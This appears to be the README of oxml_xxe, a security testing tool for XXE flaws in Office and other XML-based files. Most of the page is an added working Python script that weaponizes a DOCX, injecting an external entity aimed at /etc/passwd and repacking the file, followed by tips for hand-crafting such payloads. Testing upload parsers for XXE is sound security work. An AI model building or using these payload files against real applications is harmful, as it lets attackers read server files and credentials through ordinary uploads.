A tool for embedding XXE/XML exploits into different filetypes
Latest commit bcc02e9 Oct 31, 2017


oxml_xxe

This tool is meant to help test for XXE vulnerabilities in applications that parse OXML (Office Open XML) and related XML-based document formats. Currently supported:

  • DOCX/XLSX/PPTX
  • ODT/ODG/ODP/ODS
  • SVG
  • XML
  • PDF (experimental)
  • JPG (experimental)
  • GIF (experimental)

BH USA 2015 Presentation:

Exploiting XXE in File Upload Functionality (Slides) (Recorded Webcast)

Blog Posts on the topic:

Exploiting XXE Vulnerabilities in OXML Documents - Part 1

Exploiting CVE-2016-4264 With OXML_XXE

Developer Build

OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy:

  • You will need a copy of Ruby. RVM is suggested (https://rvm.io/rvm/install). Ruby version 2.3.5 is supported.

  • If you are running Ubuntu (also verified on Kali), you will need a few build dependencies:

apt-get install libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc

To install RVM:

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash

Install Ruby 2.3.5 with RVM

rvm install 2.3.5
rvm use 2.3.5

Install dependencies and start the server:

cd oxml_xxe
gem install bundler
bundle install
ruby server.rb

Browse to http://127.0.0.1:4567 to get started.

Main Modes

There are two main modes:

Build a File

Build mode adds a DOCTYPE that declares the external entity and inserts a reference to it into the file of the user's choice.

String Replace in File

String replace mode scans the document for the symbol § and replaces every instance of it with the XML entity reference ("&xxe;"). You can open the document in any editor and insert § wherever you want the entity's expanded value to appear. The common use case is a web application that reads an uploaded XLSX and prints the cell contents back to the screen: if the application's XML parser resolves external entities, the contents of the file the entity points to are printed in place of the marker.
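Both modes, as an added Python example written for this page (it is not oxml_xxe's own code, which is a Ruby/Sinatra web app): it unpacks a DOCX, rewrites the XML part that carries the document text, and repacks the zip. The target part name (word/document.xml), the entity target (file:///etc/passwd by default) and the sample DOCX it builds for itself are assumptions of this example, not anything the tool defines.

```python
"""Build-mode and string-replace-mode XXE injection for a DOCX (illustration, not oxml_xxe's code)."""
import io
import re
import zipfile

MARKER = "§"          # the symbol the README's string-replace mode looks for
ENTITY_NAME = "xxe"   # the marker is swapped for a reference to this entity: &xxe;


def make_doctype(root, target="file:///etc/passwd", entity=ENTITY_NAME):
    """Internal DTD subset declaring one external general entity (classic in-band XXE).
    `root` must be the document element's name, or a validating parser rejects the file."""
    return f'<!DOCTYPE {root} [\n  <!ENTITY {entity} SYSTEM "{target}">\n]>\n'


def root_element_name(xml):
    """Name of the first real element, skipping the XML declaration, PIs and comments."""
    m = re.search(r"<(?![?!])([A-Za-z_][\w.:-]*)", xml)
    return m.group(1) if m else "root"


def inject_doctype(xml, doctype):
    """Place the DOCTYPE right after the XML declaration (the only spot the spec allows)."""
    if xml.startswith("<?xml"):
        end = xml.index("?>") + 2
        return xml[:end] + "\n" + doctype + xml[end:].lstrip("\r\n")
    return doctype + xml


def build_mode(xml, target="file:///etc/passwd"):
    """README 'Build a File': add the DOCTYPE and drop &xxe; into the first text run,
    so whatever the entity expands to becomes visible document text."""
    xml = inject_doctype(xml, make_doctype(root_element_name(xml), target))
    # matches <w:t> or <w:t xml:space="preserve">, but not <w:tbl>, <w:tab/> or <w:t .../>
    return re.sub(r"(<w:t(?:\s[^>/]*)?>)", rf"\1&{ENTITY_NAME};", xml, count=1)


def string_replace_mode(xml, target="file:///etc/passwd", marker=MARKER):
    """README 'String Replace in File': every marker the user typed becomes &xxe;."""
    if marker not in xml:
        raise ValueError(f"marker {marker!r} not present; type it into the document first")
    xml = inject_doctype(xml, make_doctype(root_element_name(xml), target))
    return xml.replace(marker, f"&{ENTITY_NAME};")


def weaponize(docx_bytes, mode, target="file:///etc/passwd", part="word/document.xml"):
    """Rewrite one XML part of the OOXML zip; every other part is copied unchanged.
    The zip must be rebuilt, not patched in place: sizes and CRCs in its headers change.
    Assumption: text lives in word/document.xml (DOCX); for XLSX it is xl/sharedStrings.xml."""
    transform = {"build": build_mode, "replace": string_replace_mode}[mode]
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                data = transform(data.decode("utf-8"), target).encode("utf-8")
            dst.writestr(info, data)
    return out.getvalue()


def read_part(docx_bytes, part="word/document.xml"):
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(part).decode("utf-8")


def make_sample_docx(body_text="Quarterly totals: §"):
    """Constructed minimal DOCX (not saved by Word): just the three parts a reader needs."""
    parts = {
        "[Content_Types].xml":
            '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
            'officedocument.wordprocessingml.document.main+xml"/></Types>',
        "_rels/.rels":
            '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            'relationships/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/document.xml":
            '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            f'<w:body><w:p><w:r><w:t xml:space="preserve">{body_text}</w:t></w:r></w:p></w:body>'
            '</w:document>',
    }
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return out.getvalue()


if __name__ == "__main__":
    sample = make_sample_docx()
    print(read_part(weaponize(sample, "build")))
    print(read_part(weaponize(sample, "replace", target="file:///etc/hostname")))
```

Two details matter when doing this by hand: the DOCTYPE has to sit between the XML declaration and the document element, and its root name has to match that element (w:document here), otherwise some parsers reject the part before the entity is ever resolved. For an XLSX the visible cell text is in xl/sharedStrings.xml rather than the sheet XML, so that is the part to pass as `part`.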
